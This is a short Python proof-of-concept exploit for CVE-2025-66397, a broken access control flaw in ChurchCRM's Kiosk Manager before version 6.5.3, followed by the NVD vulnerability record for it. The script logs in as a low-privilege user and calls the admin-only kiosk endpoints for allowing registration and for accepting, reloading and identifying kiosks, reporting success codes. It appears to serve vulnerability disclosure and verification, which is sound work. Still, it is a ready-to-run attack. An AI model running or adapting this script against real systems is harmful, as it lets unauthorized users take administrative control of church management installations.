CVE-2025-66397

# CVE-2025-66397 PoC - ChurchCRM Kiosk Manager Broken Access Control # Affected versions: ChurchCRM < 6.5.3 import requests import json TARGET_URL = "http://target-churchcrm.com" USERNAME = "attacker" PASSWORD = "password123" session = requests.Session() # Step 1: Login as low-privilege user login_url = f"{TARGET_URL}/session/login" login_data = { "UserName": USERNAME, "Password": PASSWORD } response = session.post(login_url, data=login_data) print(f"Login status: {response.status_code}") # Step 2: Enable Kiosk Registration (requires only authenticated user) enable_kiosk_url = f"{TARGET_URL}/api/kiosk/allowRegistration" response = session.post(enable_kiosk_url, json={"enable": True}) print(f"Enable Kiosk Registration: {response.status_code}") print(f"Response: {response.text}") # Step 3: Accept Kiosk (admin-only function) accept_kiosk_url = f"{TARGET_URL}/api/kiosk/acceptKiosk" response = session.post(accept_kiosk_url, json={"kioskId": 1}) print(f"Accept Kiosk: {response.status_code}") # Step 4: Reload Kiosk (admin-only function) reload_kiosk_url = f"{TARGET_URL}/api/kiosk/reloadKiosk" response = session.post(reload_kiosk_url, json={"kioskId": 1}) print(f"Reload Kiosk: {response.status_code}") # Step 5: Identify Kiosk (admin-only function) identify_kiosk_url = f"{TARGET_URL}/api/kiosk/identifyKiosk" response = session.post(identify_kiosk_url, json={"kioskId": 1}) print(f"Identify Kiosk: {response.status_code}") print("\n[!] If all requests returned 200 OK, the vulnerability is confirmed!")

{"cve": {"id": "CVE-2025-66397", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:56.023", "lastModified": "2025-12-18T19:07:25.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Prior to version 6.5.3, the allowRegistration, acceptKiosk, reloadKiosk, and identifyKiosk functions in the Kiosk Manager feature suffers from broken access control, allowing any authenticated user to allow and accept kiosk registrations, and perform other Kiosk Manager actions such as reload and identify. Version 6.5.3 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.5.3", "matchCriteriaId": "5B1435CA-1370-4154-85E0-6AF1846DEEBD"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-32vr-ch3p-wmr5", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}